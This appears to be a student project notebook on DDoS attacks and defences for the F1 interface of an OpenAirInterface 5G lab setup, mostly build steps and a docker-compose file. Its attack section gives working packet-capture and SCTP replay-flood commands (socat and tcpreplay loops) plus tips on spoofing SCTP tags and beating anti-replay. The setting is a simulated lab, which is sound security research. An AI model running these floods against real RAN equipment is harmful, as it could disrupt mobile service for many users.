5G security project

# Project roadmap ## Properties | type | content | |:-------------------- |:----------------------------------------------------------------------------------------------------------------------------------------------------------------- | | Given topic | "5G base station attack and defense between CU and DU" | | Chosen interface | F1 | | Chosen attack | DDoS | | Chosen attack route | - Massive UE connection - UDP Flood - PDU Session, Bearer Flooding - Hand over, Tracking Area Update - UE context manage, RRC/PDCP signaling exchange | | Chosen structure | E1 split & multi CU_UP/DU/UE (CN + CU_CP + 2CU_UPs + 3DUs/RUs + 4UEs) ![{9E52C86A-CA7A-448F-B5E9-3D00361DF083}](https://hackmd.io/_uploads/rJv3zxa8lg.png) | | Chosen detection | | | Chosen defence | | | Chosen project title | "Design and Evaluation of DDoS Attacks and Defences on the F1 Interface for Open RAN-based 5G Systems" | ## Procedure - Initial work - [x] Topic selection - [x] Base system setting - [x] Find open-source DoS attack tools - Part I: Attack - [x] Try various attack - [ ] Upgrade attack - [ ] Verify attack - Part II: Detection - [ ] Make monitoring tool - Part III: Defence - [ ] Try various defence - [ ] Upgrade defence - Wrapping stage - [ ] Produce project report - Consider how to introduce to others - [ ] Interaction idea ## Research log & Schedule | Week # | Period | Joon | Miracle | |:------ |:--------------- |:------------------------------------------------------------- |:------------------------------------------------------------------------------- | | 41 | 06.10. - 06.16. | [review attacks]() | [make detecting tool](https://hackmd.io/@V2BwvPo9SWWFiy3BHGiAhQ/r13EFibbgx) | | 42 | 06.17. - 06.23. | [set base system](https://hackmd.io/@intJoon/SyLy7X0kee#Edit) | [upgrade detecting tool](https://hackmd.io/@V2BwvPo9SWWFiy3BHGiAhQ/Hk6mekxVgl) | | 43 | 06.24. - 06.30. | [fix attacks]() | [try various defense](https://hackmd.io/@V2BwvPo9SWWFiy3BHGiAhQ/rJrY_29Vlg) | | 44 | 07.01. - 07.07. | [fix attacks2]() | [upgrade attacks](https://hackmd.io/@V2BwvPo9SWWFiy3BHGiAhQ/SJ_wf5XBlx) | | 45 | 07.08. - 07.14. | [upgrade attacks2]() | [upgrade detecting tool](https://hackmd.io/@V2BwvPo9SWWFiy3BHGiAhQ/rJ1rEVqSge) | | 46 | 07.15. - 07.21. | [upgrade attacks3]() | [upgrade detecting tool2](https://hackmd.io/@V2BwvPo9SWWFiy3BHGiAhQ/Bk1Do7ULgg) | | 47 | 07.22. - 07.28. | [finish detectiong tool]() | [try various defence2](https://hackmd.io/@V2BwvPo9SWWFiy3BHGiAhQ/S1LtVSyPxe) | | 48 | 07.29. - 08.04. | try various defence3 | upgrade defence | | 49 | 08.05. - 08.11. | upgrade defence2 | consider scenario | | 50 | 08.12. - 08.18. | consider scenario2 | make project report | | 51 | 08.19. - 08.25. | finish project report | finish project report | | 52 | 08.26. - 09.01. | consider demo. | consider demo. | # Initial work ## Topic selection :::spoiler Attack type | type | pros | cons | |:---------------------- |:---------------------------------------------------- |:--------------------------------------------------------------------------- | | Man-in-the-Middle | - Intercept & Modify traffic - Significant impact | - Requires network control - Blocked by encryption / integrity checks | | Denial of Service | - Simple to launch - Disruptive impact | - High resource cost - Easily detected - Rate-limiting reduces effect | | Signal Tampering | - Protocol message replay -> confusion | - Needs protocol knowledge - Fails under MAC-I - Short attack window | | Auth Bypass & Spoofing | - Fake node -> potential control | - Strong auth blocks - Requires credentials / advanced exploit | -> **DoS/DDoS** Selected ::: :::spoiler Attack route & reference | route | attack type | key reference sections (3GPP 38 Series, F1) | |:--------------------------- |:--------------------------------------------- |:---------------------------------------------- | | F1-C / F1AP | - MITM - False gNB - DoS | - F1 AP: 7, 8.2-8.4, 8.7, 8.14, 10 | | F1-U (GTP-U/UDP/IP) | - Header modify - Session hijack - DDoS | - F1 DT: 4, 5.1–5.4 - F1 ST: 4-7 | | UE Context Management | - Session hijack - Replay attack | - F1 AP: 8.3, 9.2.2 | | RRC/Paging/Warning Messages | - Public safety disruption | - F1 AP: 8.4, 8.5, 8.7 | | NR MBS Procedures | - Multi-attack surface | - F1 AP: 8.14 | | Positioning / Measurement | - Privacy breach - Location tracing | - F1 AP: 8.13 | -> **F1-C, F1-U** Selected ::: ## Base system setting :::spoiler Step I: Core system > [CN reference](https://gitlab.eurecom.fr/oai/openairinterface5g/-/blob/develop/doc/NR_SA_Tutorial_OAI_CN5G.md) > [gNB & UE reference](https://gitlab.eurecom.fr/oai/openairinterface5g/-/blob/develop/doc/NR_SA_Tutorial_OAI_nrUE.md?ref_type=heads#2-oai-cn5g) #### Build ```bash= # CN sudo apt install -y git net-tools putty sudo apt update sudo apt install -y ca-certificates curl sudo install -m 0755 -d /etc/apt/keyrings sudo curl -fsSL https://download.docker.com/linux/ubuntu/gpg -o /etc/apt/keyrings/docker.asc sudo chmod a+r /etc/apt/keyrings/docker.asc echo "deb [arch=$(dpkg --print-architecture) signed-by=/etc/apt/keyrings/docker.asc] https://download.docker.com/linux/ubuntu $(. /etc/os-release && echo "$VERSION_CODENAME") stable" | sudo tee /etc/apt/sources.list.d/docker.list > /dev/null sudo apt update sudo apt install -y docker-ce docker-ce-cli containerd.io docker-buildx-plugin docker-compose-plugin sudo usermod -a -G docker $(whoami) reboot wget -O ~/oai-cn5g.zip https://gitlab.eurecom.fr/oai/openairinterface5g/-/archive/develop/openairinterface5g-develop.zip?path=doc/tutorial_resources/oai-cn5g unzip ~/oai-cn5g.zip mv ~/openairinterface5g-develop-doc-tutorial_resources-oai-cn5g/doc/tutorial_resources/oai-cn5g ~/oai-cn5g rm -r ~/openairinterface5g-develop-doc-tutorial_resources-oai-cn5g ~/oai-cn5g.zip cd ~/oai-cn5g docker compose pull # gNB and UE sudo apt install -y autoconf automake build-essential ccache cmake cpufrequtils doxygen ethtool g++ git inetutils-tools libboost-all-dev libncurses-dev libusb-1.0-0 libusb-1.0-0-dev libusb-dev python3-dev python3-mako python3-numpy python3-requests python3-scipy python3-setuptools python3-ruamel.yaml git clone https://github.com/EttusResearch/uhd.git ~/uhd cd ~/uhd git checkout v4.8.0.0 cd host mkdir build cd build cmake ../ make -j $(nproc) make test # This step is optional sudo make install sudo ldconfig sudo uhd_images_downloader git clone https://gitlab.eurecom.fr/oai/openairinterface5g.git ~/openairinterface5g cd ~/openairinterface5g git checkout develop cd ~/openairinterface5g/cmake_targets ./build_oai -I sudo apt install -y libforms-dev libforms-bin cd ~/openairinterface5g/cmake_targets ./build_oai -w USRP --ninja --nrUE --gNB --build-lib "nrscope" -C ``` #### Commands ```bash= # Run CN cd ~/oai-cn5g docker compose up -d # Run gNB cd ~/openairinterface5g/cmake_targets/ran_build/build sudo ./nr-softmodem -O ../../../targets/PROJECTS/GENERIC-NR-5GC/CONF/gnb.sa.band78.fr1.106PRB.usrpb210.conf --gNBs.[0].min_rxtxtime 6 --rfsim # Run UE cd ~/openairinterface5g/cmake_targets/ran_build/build sudo ./nr-uesoftmodem -r 106 --numerology 1 --band 78 -C 3619200000 --uicc0.imsi 001010000000001 --rfsim # End-to-end connectivity test ping 192.168.70.135 -I oaitun_ue1 # Stop CN cd ~/oai-cn5g docker compose down ``` ::: :::spoiler Step II: Split gNB > [Docker reference](https://gitlab.eurecom.fr/oai/openairinterface5g/-/blob/develop/ci-scripts/yaml_files/5g_rfsimulator/README.md) > [Commands reference](https://gitlab.eurecom.fr/oai/openairinterface5g/-/tree/develop/ci-scripts/yaml_files/5g_rfsimulator_e1) #### Build ```bash= # CN sudo apt install docker-compose docker login docker pull mysql:8.0 docker pull oaisoftwarealliance/oai-amf:v2.1.10 docker pull oaisoftwarealliance/oai-smf:v2.1.10 docker pull oaisoftwarealliance/oai-upf:v2.1.10 docker pull oaisoftwarealliance/trf-gen-cn5g:focal docker pull oaisoftwarealliance/oai-gnb:develop docker pull oaisoftwarealliance/oai-nr-ue:develop docker logout ``` #### Commands ```bash= # Run CN cd ~/openairinterface5g/ci-scripts/yaml_files/5g_rfsimulator_e1 docker-compose up -d mysql oai-amf oai-smf oai-upf docker-compose ps -a # Wait for system healthy # Run gNB cd ~/openairinterface5g/ci-scripts/yaml_files/5g_rfsimulator_e1 docker-compose up -d oai-cucp oai-cuup{,2,3} oai-du{,2,3} docker-compose ps -a # Wait for system healthy # Run UE cd ~/openairinterface5g/ci-scripts/yaml_files/5g_rfsimulator_e1 docker-compose up -d oai-nr-ue{,2,3} # Test cd ~/openairinterface5g/ci-scripts/yaml_files/5g_rfsimulator_e1 docker-compose ps -a docker logs rfsim5g-oai-cucp docker logs rfsim5g-oai-cucp | grep CU-U docker logs -f rfsim5g-oai-cuup docker logs -f rfsim5g-oai-cuup2 docker logs -f rfsim5g-oai-cuup3 docker logs rfsim5g-oai-du docker logs rfsim5g-oai-du2 docker logs rfsim5g-oai-du3 docker logs rfsim5g-oai-nr-ue docker logs rfsim5g-oai-nr-ue2 docker logs rfsim5g-oai-nr-ue3 docker exec -it rfsim5g-oai-nr-ue ip a show oaitun_ue1 docker exec -it rfsim5g-oai-nr-ue2 ip a show oaitun_ue1 docker exec -it rfsim5g-oai-nr-ue3 ip a show oaitun_ue1 docker exec -it rfsim5g-oai-nr-ue ping -c1 12.1.1.2 # ip might be diff. docker exec -it rfsim5g-oai-nr-ue ping -c1 12.1.1.3 docker exec -it rfsim5g-oai-nr-ue ping -c1 12.1.1.4 # Stop all docker compose stop oai-nr-ue{,2,3} docker compose down ``` ::: :::spoiler Step III: Custom system > openairinterface5g/ci-scripts/yaml_files/5g_rfsimulator_e1/docker-compose.yaml #### Edit ``` bash= services: mysql: container_name: "rfsim5g-mysql" image: mysql:8.0 init: true volumes: - ../5g_rfsimulator/oai_db.sql:/docker-entrypoint-initdb.d/oai_db.sql - ../5g_rfsimulator/mysql-healthcheck.sh:/tmp/mysql-healthcheck.sh environment: - TZ=Europe/Paris - MYSQL_DATABASE=oai_db - MYSQL_USER=test - MYSQL_PASSWORD=test - MYSQL_ROOT_PASSWORD=linux healthcheck: test: /bin/bash -c "/tmp/mysql-healthcheck.sh" start_period: 10s start_interval: 500ms interval: 10s timeout: 5s retries: 30 networks: core_net: ipv4_address: 192.168.71.131 oai-amf: container_name: "rfsim5g-oai-amf" image: oaisoftwarealliance/oai-amf:v2.1.9 environment: - TZ=Europe/paris volumes: - ./mini_nonrf_config_3slices.yaml:/openair-amf/etc/config.yaml depends_on: - mysql networks: core_net: ipv4_address: 192.168.71.132 oai-smf: container_name: "rfsim5g-oai-smf" image: oaisoftwarealliance/oai-smf:v2.1.9 environment: - TZ=Europe/Paris volumes: - ./mini_nonrf_config_3slices.yaml:/openair-smf/etc/config.yaml depends_on: - oai-amf networks: core_net: ipv4_address: 192.168.71.133 oai-upf: container_name: "rfsim5g-oai-upf" image: oaisoftwarealliance/oai-upf:v2.1.9 init: true environment: - TZ=Europe/Paris volumes: - ./mini_nonrf_config_3slices.yaml:/openair-upf/etc/config.yaml depends_on: - oai-smf cap_add: - NET_ADMIN - SYS_ADMIN cap_drop: - ALL privileged: true networks: core_net: ipv4_address: 192.168.71.134 interface_name: eth0 traffic_net: ipv4_address: 192.168.72.134 interface_name: eth1 oai-cucp: image: ${REGISTRY:-oaisoftwarealliance}/${GNB_IMG:-oai-gnb}:${TAG:-develop} container_name: rfsim5g-oai-cucp cap_drop: - ALL environment: USE_ADDITIONAL_OPTIONS: --log_config.global_log_options level,nocolor,time --gNBs.[0].E1_INTERFACE.[0].ipv4_cucp 192.168.77.2 --gNBs.[0].local_s_address 192.168.72.2 ASAN_OPTIONS: detect_leaks=0 depends_on: - oai-upf networks: core_net: ipv4_address: 192.168.71.150 f1c_net: ipv4_address: 192.168.72.2 e1_net: ipv4_address: 192.168.77.2 volumes: - ../../conf_files/gnb-cucp.sa.f1.conf:/opt/oai-gnb/etc/gnb.conf healthcheck: test: /bin/bash -c "pgrep nr-softmodem" start_period: 10s start_interval: 500ms interval: 10s timeout: 5s retries: 5 oai-cuup: image: ${REGISTRY:-oaisoftwarealliance}/${NRCUUP_IMG:-oai-nr-cuup}:${TAG:-develop} container_name: rfsim5g-oai-cuup cap_drop: - ALL environment: USE_ADDITIONAL_OPTIONS: --log_config.global_log_options level,nocolor,time --gNBs.[0].E1_INTERFACE.[0].ipv4_cucp 192.168.77.2 --gNBs.[0].E1_INTERFACE.[0].ipv4_cuup 192.168.77.3 --gNBs.[0].local_s_address 192.168.73.2 --gNBs.[0].remote_s_address 127.0.0.1 ASAN_OPTIONS: detect_leaks=0 depends_on: - oai-cucp networks: core_net: ipv4_address: 192.168.71.161 f1u_1_net: ipv4_address: 192.168.73.2 e1_net: ipv4_address: 192.168.77.3 volumes: - ../../conf_files/gnb-cuup.sa.f1.conf:/opt/oai-gnb/etc/gnb.conf healthcheck: test: /bin/bash -c "pgrep nr-cuup" start_period: 10s start_interval: 500ms interval: 10s timeout: 5s retries: 5 oai-cuup2: image: ${REGISTRY:-oaisoftwarealliance}/${NRCUUP_IMG:-oai-nr-cuup}:${TAG:-develop} container_name: rfsim5g-oai-cuup2 cap_drop: - ALL environment: USE_ADDITIONAL_OPTIONS: --log_config.global_log_options level,nocolor,time --gNBs.[0].gNB_CU_UP_ID 0xe01 --gNBs.[0].E1_INTERFACE.[0].ipv4_cucp 192.168.77.2 --gNBs.[0].E1_INTERFACE.[0].ipv4_cuup 192.168.77.4 --gNBs.[0].local_s_address 192.168.74.2 --gNBs.[0].remote_s_address 127.0.0.1 --gNBs.[0].NETWORK_INTERFACES.GNB_IPV4_ADDRESS_FOR_NGU 192.168.71.162 --gNBs.[0].plmn_list.[0].snssaiList.[0].sst 2 ASAN_OPTIONS: detect_leaks=0 depends_on: - oai-cucp networks: core_net: ipv4_address: 192.168.71.162 f1u_2_net: ipv4_address: 192.168.74.2 e1_net: ipv4_address: 192.168.77.4 volumes: - ../../conf_files/gnb-cuup.sa.f1.conf:/opt/oai-gnb/etc/gnb.conf healthcheck: test: /bin/bash -c "pgrep nr-cuup" start_period: 10s start_interval: 500ms interval: 10s timeout: 5s retries: 5 oai-du: image: ${REGISTRY:-oaisoftwarealliance}/${GNB_IMG:-oai-gnb}:${TAG:-develop} container_name: rfsim5g-oai-du cap_drop: - ALL environment: USE_ADDITIONAL_OPTIONS: --rfsim --log_config.global_log_options level,nocolor,time --MACRLCs.[0].local_n_address 192.168.72.3 --MACRLCs.[0].remote_n_address oai-cucp --MACRLCs.[0].local_n_address_f1u 192.168.73.3 ASAN_OPTIONS: detect_leaks=0 depends_on: - oai-cucp - oai-cuup networks: f1c_net: ipv4_address: 192.168.72.3 f1u_1_net: ipv4_address: 192.168.73.3 ue_net: ipv4_address: 192.168.78.2 volumes: - ../../conf_files/gnb-du.sa.band78.106prb.rfsim.conf:/opt/oai-gnb/etc/gnb.conf healthcheck: test: /bin/bash -c "pgrep nr-softmodem" start_period: 10s start_interval: 500ms interval: 10s timeout: 5s retries: 5 oai-du2: image: ${REGISTRY:-oaisoftwarealliance}/${GNB_IMG:-oai-gnb}:${TAG:-develop} container_name: rfsim5g-oai-du2 cap_drop: - ALL environment: USE_ADDITIONAL_OPTIONS: --rfsim --log_config.global_log_options level,nocolor,time --gNBs.[0].gNB_DU_ID 0xe01 --gNBs.[0].nr_cellid 87654321 --gNBs.[0].servingCellConfigCommon.[0].physCellId 1 --MACRLCs.[0].remote_n_address oai-cucp --MACRLCs.[0].local_n_address 192.168.72.4 --MACRLCs.[0].local_n_address_f1u 192.168.74.3 ASAN_OPTIONS: detect_leaks=0 depends_on: - oai-cucp - oai-cuup2 networks: f1c_net: ipv4_address: 192.168.72.4 f1u_2_net: ipv4_address: 192.168.74.3 ue_net: ipv4_address: 192.168.78.3 volumes: - ../../conf_files/gnb-du.sa.band78.106prb.rfsim.conf:/opt/oai-gnb/etc/gnb.conf healthcheck: test: /bin/bash -c "pgrep nr-softmodem" start_period: 10s start_interval: 500ms interval: 10s timeout: 5s retries: 5 oai-du3: image: ${REGISTRY:-oaisoftwarealliance}/${GNB_IMG:-oai-gnb}:${TAG:-develop} container_name: rfsim5g-oai-du3 cap_drop: - ALL environment: USE_ADDITIONAL_OPTIONS: --rfsim --log_config.global_log_options level,nocolor,time --gNBs.[0].gNB_DU_ID 0xe02 --gNBs.[0].nr_cellid 11111111 --gNBs.[0].servingCellConfigCommon.[0].physCellId 2 --MACRLCs.[0].remote_n_address oai-cucp --MACRLCs.[0].local_n_address 192.168.72.5 --MACRLCs.[0].local_n_address_f1u 192.168.74.4 ASAN_OPTIONS: detect_leaks=0 depends_on: - oai-cucp - oai-cuup2 - oai-du2 networks: f1c_net: ipv4_address: 192.168.72.5 f1u_2_net: ipv4_address: 192.168.74.4 ue_net: ipv4_address: 192.168.78.4 volumes: - ../../conf_files/gnb-du.sa.band78.106prb.rfsim.conf:/opt/oai-gnb/etc/gnb.conf healthcheck: test: /bin/bash -c "pgrep nr-softmodem" start_period: 10s start_interval: 500ms interval: 10s timeout: 5s retries: 5 oai-nr-ue: image: ${REGISTRY:-oaisoftwarealliance}/${NRUE_IMG:-oai-nr-ue}:${TAG:-develop} container_name: rfsim5g-oai-nr-ue cap_drop: - ALL cap_add: - NET_ADMIN # for interface bringup - NET_RAW # for ping environment: USE_ADDITIONAL_OPTIONS: --rfsim --log_config.global_log_options level,nocolor,time -r 106 --numerology 1 -C 3619200000 --uicc0.imsi 208990100001100 --rfsimulator.serveraddr oai-du depends_on: - oai-du networks: ue_net: ipv4_address: 192.168.78.5 devices: - /dev/net/tun:/dev/net/tun volumes: - ../../conf_files/nrue.uicc.conf:/opt/oai-nr-ue/etc/nr-ue.conf healthcheck: test: /bin/bash -c "pgrep nr-uesoftmodem" start_period: 10s start_interval: 500ms interval: 10s timeout: 5s retries: 5 oai-nr-ue2: image: ${REGISTRY:-oaisoftwarealliance}/${NRUE_IMG:-oai-nr-ue}:${TAG:-develop} container_name: rfsim5g-oai-nr-ue2 cap_drop: - ALL cap_add: - NET_ADMIN # for interface bringup - NET_RAW # for ping environment: USE_ADDITIONAL_OPTIONS: --rfsim --log_config.global_log_options level,nocolor,time -r 106 --numerology 1 -C 3619200000 --uicc0.imsi 208990100001101 --uicc0.nssai_sst 2 --rfsimulator.serveraddr 192.168.78.3 depends_on: - oai-du2 networks: ue_net: ipv4_address: 192.168.78.6 devices: - /dev/net/tun:/dev/net/tun volumes: - ../../conf_files/nrue.uicc.conf:/opt/oai-nr-ue/etc/nr-ue.conf healthcheck: test: /bin/bash -c "pgrep nr-uesoftmodem" start_period: 10s start_interval: 500ms interval: 10s timeout: 5s retries: 5 oai-nr-ue3: image: ${REGISTRY:-oaisoftwarealliance}/${NRUE_IMG:-oai-nr-ue}:${TAG:-develop} container_name: rfsim5g-oai-nr-ue3 cap_drop: - ALL cap_add: - NET_ADMIN # for interface bringup - NET_RAW # for ping environment: USE_ADDITIONAL_OPTIONS: --rfsim --log_config.global_log_options level,nocolor,time -r 106 --numerology 1 -C 3619200000 --uicc0.imsi 208990100001102 --uicc0.nssai_sst 2 --rfsimulator.serveraddr 192.168.78.4 ASAN_OPTIONS: detect_leaks=0 depends_on: - oai-du3 networks: ue_net: ipv4_address: 192.168.78.7 devices: - /dev/net/tun:/dev/net/tun volumes: - ../../conf_files/nrue.uicc.conf:/opt/oai-nr-ue/etc/nr-ue.conf healthcheck: test: /bin/bash -c "pgrep nr-uesoftmodem" start_period: 10s start_interval: 500ms interval: 10s timeout: 5s retries: 5 oai-nr-ue4: image: ${REGISTRY:-oaisoftwarealliance}/${NRUE_IMG:-oai-nr-ue}:${TAG:-develop} container_name: rfsim5g-oai-nr-ue4 cap_drop: - ALL cap_add: - NET_ADMIN # for interface bringup - NET_RAW # for ping environment: USE_ADDITIONAL_OPTIONS: --rfsim --log_config.global_log_options level,nocolor,time -r 106 --numerology 1 -C 3619200000 --uicc0.imsi 208990100001103 --uicc0.nssai_sst 2 --rfsimulator.serveraddr 192.168.78.4 ASAN_OPTIONS: detect_leaks=0 depends_on: - oai-du3 networks: ue_net: ipv4_address: 192.168.78.8 devices: - /dev/net/tun:/dev/net/tun volumes: - ../../conf_files/nrue.uicc.conf:/opt/oai-nr-ue/etc/nr-ue.conf healthcheck: test: /bin/bash -c "pgrep nr-uesoftmodem" start_period: 10s start_interval: 500ms interval: 10s timeout: 5s retries: 5 networks: core_net: driver: bridge name: rfsim5g-oai-core-net ipam: config: - subnet: 192.168.71.128/26 driver_opts: com.docker.network.bridge.name: "rfsim5g-core" traffic_net: driver: bridge name: rfsim5g-oai-traffic-net ipam: config: - subnet: 192.168.72.128/26 driver_opts: com.docker.network.bridge.name: "rfsim5g-traffic" f1c_net: driver: bridge name: rfsim5g-oai-f1c-net ipam: config: - subnet: 192.168.72.0/28 driver_opts: com.docker.network.bridge.name: "rfsim5g-f1c" f1u_1_net: driver: bridge name: rfsim5g-oai-f1u-1-net ipam: config: - subnet: 192.168.73.0/28 driver_opts: com.docker.network.bridge.name: "rfsim5g-f1u_1" f1u_2_net: driver: bridge name: rfsim5g-oai-f1u-2-net ipam: config: - subnet: 192.168.74.0/28 driver_opts: com.docker.network.bridge.name: "rfsim5g-f1u_2" e1_net: driver: bridge name: rfsim5g-oai-e1-net ipam: config: - subnet: 192.168.77.0/28 driver_opts: com.docker.network.bridge.name: "rfsim5g-e1" ue_net: driver: bridge name: rfsim5g-oai-ue-net ipam: config: - subnet: 192.168.78.0/28 driver_opts: com.docker.network.bridge.name: "rfsim5g-ue" ``` #### Commands ```bash= # Run system cd ~/openairinterface5g/ci-scripts/yaml_files/5g_rfsimulator_e1 docker compose up -d mysql oai-amf oai-smf oai-upf # CN docker compose up -d oai-cucp oai-cuup{,2} oai-du{,2,3} # gNB docker compose up -d oai-nr-ue docker compose up -d oai-nr-ue2 docker compose up -d oai-nr-ue3 docker compose up -d oai-nr-ue4 # Show system healthy docker compose ps -a # Show logs docker logs -f rfsim5g-oai-cucp docker logs -f rfsim5g-oai-cuup docker logs -f rfsim5g-oai-cuup2 docker logs -f rfsim5g-oai-du docker logs -f rfsim5g-oai-du2 docker logs -f rfsim5g-oai-du3 docker logs -f rfsim5g-oai-nr-ue docker logs -f rfsim5g-oai-nr-ue2 docker logs -f rfsim5g-oai-nr-ue3 docker logs -f rfsim5g-oai-nr-ue4 # Find UE IP docker exec -it rfsim5g-oai-nr-ue ip a show oaitun_ue1 docker exec -it rfsim5g-oai-nr-ue2 ip a show oaitun_ue1 docker exec -it rfsim5g-oai-nr-ue3 ip a show oaitun_ue1 docker exec -it rfsim5g-oai-nr-ue4 ip a show oaitun_ue1 # Test service status docker exec -it rfsim5g-oai-nr-ue2 ping -c5 12.1.1.2 # ip might be diff. docker exec -it rfsim5g-oai-nr-ue ping -c5 12.1.1.3 docker exec -it rfsim5g-oai-nr-ue ping -c5 12.1.1.4 docker exec -it rfsim5g-oai-nr-ue ping -c5 12.1.1.5 # Shwo resource usage docker stats # Stop system docker compose stop oai-nr-ue{,2,3,4} docker compose down ``` ::: or :::spoiler Download from GitHub {%preview https://github.com/intJoon/sp5g.git %} ::: ## d # Part I: Attack ## Steps - Try various attack - F1-C, Control - [x] Massive UE connection - [ ] UE context manage, RRC/PDCP signaling exchange - [ ] Hand over, Tracking Area Update - [ ] PDU Session, Bearer Flooding - F1-U, Data - [x] UDP Flood - F1AP Vulnerability - [ ] Information sniffing (IP/access permission) - [ ] Fuzzing (try any input, causing crash, find zero-day) - None of above - Not Related (TCP or HTTP related = layer 3 network layer, != layer 4 transport layer) - Ping of death (ping but large data included) - Smurfing (ICMP echo, no need IP) - TCP SYN flood - Random access channel flooding - Land Attack (source IP = destination IP -> infinite loop) - Upgrade attack - [ ] Try sniffing (Ease attack condition) - [ ] Consider Optional Security - [ ] Consider Static/Dynamic/Dependancy analysis - [ ] Automate Attack - [ ] Fast flux - [ ] Make it distributed (Upgrade to DDoS, e.g. botnet) - [ ] Verify attack ## Tools docker tcpdump tshark / wireshark socat tcpreplay ## Try various attack ### F1-C :::spoiler Massive UE connection - Joon | category | detail | |:--------- |:------------------------------------ | | System | CN + Monolithic gNB + 8UE/16UE | | Hardware | 8GB RAM -> 8UE, 16GB RAM -> 16UE | | Tools | N/A | | Condition | Many UE | | Result | Service slows, List full -> New UE X | | Found | Ubuntu = 2GB, UE ~> CN | | Drawback | UE Cost up | | Comment | No malfunction != attack | > Service slows, List full -> New UE X ![image](https://hackmd.io/_uploads/HJ9JcPwgxe.png) ```bash= # Run CN cd ~/oai-cn5g docker compose up -d # Run gNB cd ~/openairinterface5g/cmake_targets/ran_build/build sudo ./nr-softmodem -O ../../../targets/PROJECTS/GENERIC-NR-5GC/CONF/gnb.sa.band78.fr1.106PRB.usrpb210.conf --gNBs.[0].min_rxtxtime 6 --rfsim # Run UE cd ~/openairinterface5g/cmake_targets/ran_build/build sudo ./nr-uesoftmodem -r 106 --numerology 1 --band 78 -C 3619200000 --uicc0.imsi 001010000000001 --rfsim sudo ./nr-uesoftmodem -r 106 --numerology 1 --band 78 -C 3619200000 --uicc0.imsi 001010000000002 --rfsim sudo ./nr-uesoftmodem -r 106 --numerology 1 --band 78 -C 3619200000 --uicc0.imsi 001010000000003 --rfsim sudo ./nr-uesoftmodem -r 106 --numerology 1 --band 78 -C 3619200000 --uicc0.imsi 001010000000004 --rfsim ... ``` ::: :::spoiler UE context manage - Joon | category | detail | |:--------- |:------------------------------------------- | | System | CN + F1/E1 Split gNB(1CU-C/3CU-U/3DU) + 4UE | | Hardware | 8GB RAM | | Tools | python-scapy | | Condition | Known IP, | | Result | No impact | | Found | | | Drawback | | | Comment | | > Before attack ![{1CAF0DF6-9045-4A2C-BE7D-08123297A559}](https://hackmd.io/_uploads/Sy4Ox80kgx.png) --- > Recorded F1AP packets ![{E751054A-B6AE-4386-B985-7ADD9C6672F9}](https://hackmd.io/_uploads/HJXEpqylgg.png) ```bash= # Record CU-CP sudo tcpdump -i any dst host 192.168.72.2 -w cu-cp-all.pcap ^c # Extract CU-CP packet tshark -r cu-cp-all.pcap -Y "frame.number==58" -x > cu-cp-uesetup.hex # Create attacker container docker stop attacker docker rm attacker docker run -dit --name attacker --network rfsim5g-oai-f1c-net ubuntu:24.04 bash # Attacker container setup docker cp flood_uesetup.py attacker:/root/ docker exec -it attacker bash apt update && apt install -y python3-scapy python3-pip libpcap-dev python3-venv tcpreplay python3-full python3 -m venv /root/venv source /root/venv/bin/activate pip install --upgrade pip pip install scapy # Attack python3 /root/flood_uesetup.py # -> 아무런 반응이 없어 어떡하지.. # docker stats로 봐도 attacker 도커는 cpu 사용량이 0에서 22%가량 올라가는데 cu-cp는 미동도 없어, 타격이 없나봐. # docker logs rfsim5g-oai-cucp로 로그를 봐도 새로운 내용이 안 나오고, # 우분투 시스템 모니터로 리소스 상태 보면 네트워크만 올라 갔다가 플러딩 끝나면 내려가 sctp_test -H 192.168.72.6 -P 50000 -h 192.168.72.2 -p 38472 -s -d 2 -x 1 docker exec -it rfsim5g-oai-nr-ue bash apt update apt install -y tcpdump tcpdump -i oaitun_ue1 -w /root/ue_capture.pcap ``` ```bash= sudo apt install socat tshark -r cu-cp-all.pcap -Y "frame.number==58" -w extract.pcap tshark -r extract.pcap -x | grep -oE '([0-9a-f]{2} ){16}' | tr -d ' ' | xxd -r -p > packet.bin while true; do socat -u FILE:./packet.bin SCTP4:192.168.72.2:38472 done editcap -r cu-cp-all.pcap extract2.pcap 58 77 tshark -r extract2.pcap -x | grep -oE '([0-9a-f]{2} ){16}' | tr -d ' ' | xxd -r -p > packet2.bin while true; do socat -u FILE:./packet2.bin SCTP4:192.168.72.2:38472 done # -> 마지막 UE 재연결 후 핑 안 됨 # CPU 8% 증가, MEM 초당 0.04MiB 증가 ``` ::: :::spoiler UE context manage - Miracle {%preview https://hackmd.io/@V2BwvPo9SWWFiy3BHGiAhQ/rkDTM_delg %} | category | detail | |:--------- |:------------------------------------------- | | System | CN + split gNB (CU-CP + DU) + 3 UE | | Hardware | . | | Tools | Docker, tcpdump, Wireshark, tcpreplay | | Condition | Captured F1SetupRequest via tcpdump | | Result | No F1SetupResponse; DU becomes unresponsive | | Found | Many SCTP retransmits; frequent heartbeats | | Drawback | Loop did not fully crash DU/CU | | Comment | Requires pre-capture; impact is limited | | requirement | detail | |:----------------- |:--------------------------------------------------- | | Network access | Root on F1-C bridge interface (rfsim5g-f1c) | | Tool privilege | Ability to run tcpdump and tcpreplay as sudo | | Known info | CU & DU IPs, SCTP port (38472), F1SetupRequest pcap | | Replay capability | tcpreplay must preserve SCTP tags and TSNs | | aspect | notes | | :--------------- | :------------------------------------------- | | Error | Attack loop didn’t crash DU/CU fully | | Assumption | CU will retry on all duplicate SetupRequests | | Assumption | No replay protection on F1SetupRequest | | Optimization | Increase pps or use sendfast for higher rate | | Optimization | Launch attack before F1SetupResponse arrives | > try... Capture and replay before the first F1SetupResponse. Use higher pps (e.g. --pps in tcpreplay) or sendfast. Spoof SCTP TSN and tag for better acceptance. Run multiple parallel replay loops. Bypass anti-replay by timing floods during setup window. ```bash= # Run CN cd ~/openairinterface5g/ci-scripts/yaml_files/5g_rfsimulator_e1 docker-compose up -d mysql oai-amf oai-smf oai-upf # Run CU-CP and DU docker-compose up -d oai-cucp oai-du # Run UEs docker-compose up -d oai-nr-ue oai-nr-ue2 oai-nr-ue3 # Capture baseline F1-C traffic sudo tcpdump -i rfsim5g-f1c port 38472 -w baseline_cu.pcap sudo tcpdump -i rfsim5g-f1c port 38472 -w baseline_du.pcap # Rebuild F1SetupRequest pcap via Wireshark (export “F1SetupRequest” only) # Send one replay packet sudo tcpreplay --intf1=rfsim5g-f1c f1setup_replay.pcap # Flood forever with 0.1 s delay while true; do sudo tcpreplay --intf1=rfsim5g-f1c f1setup_replay.pcap sleep 0.1 done # High-speed variants sudo tcpreplay --intf1=rfsim5g-f1c --loop=0 --multiplier=10 f1setup_replay.pcap sudo tcpreplay --intf1=rfsim5g-f1c --loop=0 --pps=10000 f1setup_replay.pcap ``` ::: 